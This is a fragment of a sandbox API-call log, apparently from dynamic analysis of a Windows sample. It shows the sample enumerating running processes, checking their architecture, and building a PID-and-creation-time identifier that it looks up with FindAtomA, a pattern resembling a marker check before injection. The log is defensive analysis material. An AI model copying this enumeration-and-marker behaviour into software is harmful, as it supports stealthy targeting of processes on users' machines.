	[0085.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0085.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x6a0
	[0085.109] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.109] CloseHandle (hObject=0x6a0) returned 1
	[0085.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x6a0
	[0085.109] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.109] CloseHandle (hObject=0x6a0) returned 1
	[0085.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x397e8d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0085.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x6a0
	[0085.110] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.110] CloseHandle (hObject=0x6a0) returned 1
	[0085.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39a1bc8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0085.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x6a0
	[0085.110] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.110] CloseHandle (hObject=0x6a0) returned 1
	[0085.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0085.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x6a0
	[0085.110] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.110] CloseHandle (hObject=0x6a0) returned 1
	[0085.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x397e9b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0085.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x6a0
	[0085.110] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.110] CloseHandle (hObject=0x6a0) returned 1
	[0085.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x396e8b0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0085.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x6a0
	[0085.111] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.111] CloseHandle (hObject=0x6a0) returned 1
	[0085.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x6a0
	[0085.111] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.111] CloseHandle (hObject=0x6a0) returned 1
	[0085.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x396e870, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0085.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x6a0
	[0085.111] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.111] CloseHandle (hObject=0x6a0) returned 1
	[0085.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39a1bf0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0085.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x6a0
	[0085.112] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.112] CloseHandle (hObject=0x6a0) returned 1
	[0085.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39a19c0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0085.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x6a0
	[0085.112] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.112] CloseHandle (hObject=0x6a0) returned 1
	[0085.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0085.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x6a0
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.112] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetLastError () returned 0x5
	[0085.113] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.113] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0085.114] GetProcessTimes (in: hProcess=0x6a0, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.114] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.115] GetLastError () returned 0x5
	[0085.116] GetLastError () returned 0x5
	[0085.116] GetLastError () returned 0x5
	[0085.116] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.116] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0085.116] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.116] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0085.116] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0085.116] CloseHandle (hObject=0x6a0) returned 1
	[0085.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0085.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0085.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x6a0
	[0085.117] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.117] CloseHandle (hObject=0x6a0) returned 1
	[0085.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x397e9b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0085.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0085.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0085.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x6a0
	[0085.117] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.117] CloseHandle (hObject=0x6a0) returned 1
	[0085.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tmp8C77.tmp", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmp8C77.tmp", lpUsedDefaultChar=0x0) returned 11
	[0085.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x170c8) returned 0xc0000004
	[0085.409] VirtualAlloc (lpAddress=0x0, dwSize=0x171c8, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0085.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x171c8, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0085.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0085.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397eab8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0085.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0085.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0085.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0085.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0085.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0085.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0085.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0085.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0085.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0085.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0085.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0085.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0085.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x76c8e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0085.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0085.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0085.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0085.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0085.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0085.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0085.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0085.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0085.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x6a0
	[0085.420] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.420] CloseHandle (hObject=0x6a0) returned 1
	[0085.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x397ea88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0085.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0085.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0085.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x396ea50, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0085.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x6a0
	[0085.421] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.421] CloseHandle (hObject=0x6a0) returned 1
	[0085.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x396ea50, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0085.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0085.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x6a0
	[0085.422] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.422] CloseHandle (hObject=0x6a0) returned 1
	[0085.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x6a0
	[0085.422] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.422] CloseHandle (hObject=0x6a0) returned 1
